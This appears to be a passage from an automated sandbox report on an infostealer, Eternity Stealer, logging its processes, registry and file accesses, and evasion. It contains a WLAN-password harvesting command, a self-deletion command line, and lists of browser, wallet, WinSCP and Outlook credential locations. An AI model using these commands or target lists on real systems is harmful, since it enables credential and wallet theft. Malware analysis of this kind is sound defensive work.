                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: odbc32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpqec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: qutil.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ws2help.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nci.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: devrtl.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: napmontr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: certcli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ndfapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wdi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: tdh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanutil.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pcollab.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanhlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: cryptbase.dllJump to behavior
                Source: Stealer.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .csproj2
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/0@5/5
                Source: C:\Users\user\Desktop\Stealer.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Stealer.exeMutant created: \Sessions\1\BaseNamedObjects\npbouttkra
                Source: C:\Users\user\Desktop\Stealer.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC8CC.tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c.J..... ......0.-...............jw..............-.............f.................N.....Jump to behavior
                Source: Stealer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Stealer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Stealer.exe "C:\Users\user\Desktop\Stealer.exe"
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Stealer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Stealer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Stealer.exeStatic PE information: 0x81805410 [Sat Nov 6 15:43:12 2038 UTC]
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DA79CD push ebx; retf 0_2_000007FE93DA79DA
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D9D980 pushad ; iretd 0_2_000007FE93D9D929
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D800BD pushad ; iretd 0_2_000007FE93D800C1
                Source: Stealer.exe, mQ.csHigh entropy of concatenated method names: '_003CPerformSelfDestruct_003Eb__1_0', '_003CPerformSelfDestruct_003Eb__1_1', '_003CPerformSelfDestruct_003Eb__1_2', 'HandleSelfDestruct', 'Iqvoaankwbsmkeovdsfoek', 'Iuvlwqesyazuazlxlvwmse', 'Idjirxbssjfcxsxjblftyf', 'Ipyirndbhzenzwaglixhwt', 'Icbxquhcchziremzkgwyky', 'Iwxcwnfbitkwelqzupxifu'

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\System32\cmd.exeFile deleted: c:\users\user\desktop\stealer.exeJump to behavior
                Self deletion via cmd or bat file
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"Jump to behavior
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 9200
                Source: unknownNetwork traffic detected: HTTP traffic on port 9200 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 9200 -> 49166
                Source: C:\Users\user\Desktop\Stealer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
                Source: C:\Users\user\Desktop\Stealer.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeMemory allocated: 1A1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeWindow / User API: threadDelayed 493Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeWindow / User API: threadDelayed 9341Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exe TID: 2692Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exe TID: 2648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exe TID: 2648Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exe TID: 2588Thread sleep count: 493 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exe TID: 2588Thread sleep count: 9341 > 30Jump to behavior
                Source: C:\Windows\System32\netsh.exe TID: 2700Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select TotalPhysicalMemory From Win32_ComputerSystem
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Model from Win32_ComputerSystem
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer from Win32_ComputerSystem
                Source: C:\Users\user\Desktop\Stealer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\Stealer.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeQueries volume information: C:\Users\user\Desktop\Stealer.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile

                Stealing of Sensitive Information

                barindex
                Yara detected Eternity Stealer
                Source: Yara matchFile source: Stealer.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal WLAN passwords
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Users\user\Desktop\Stealer.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Stealer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
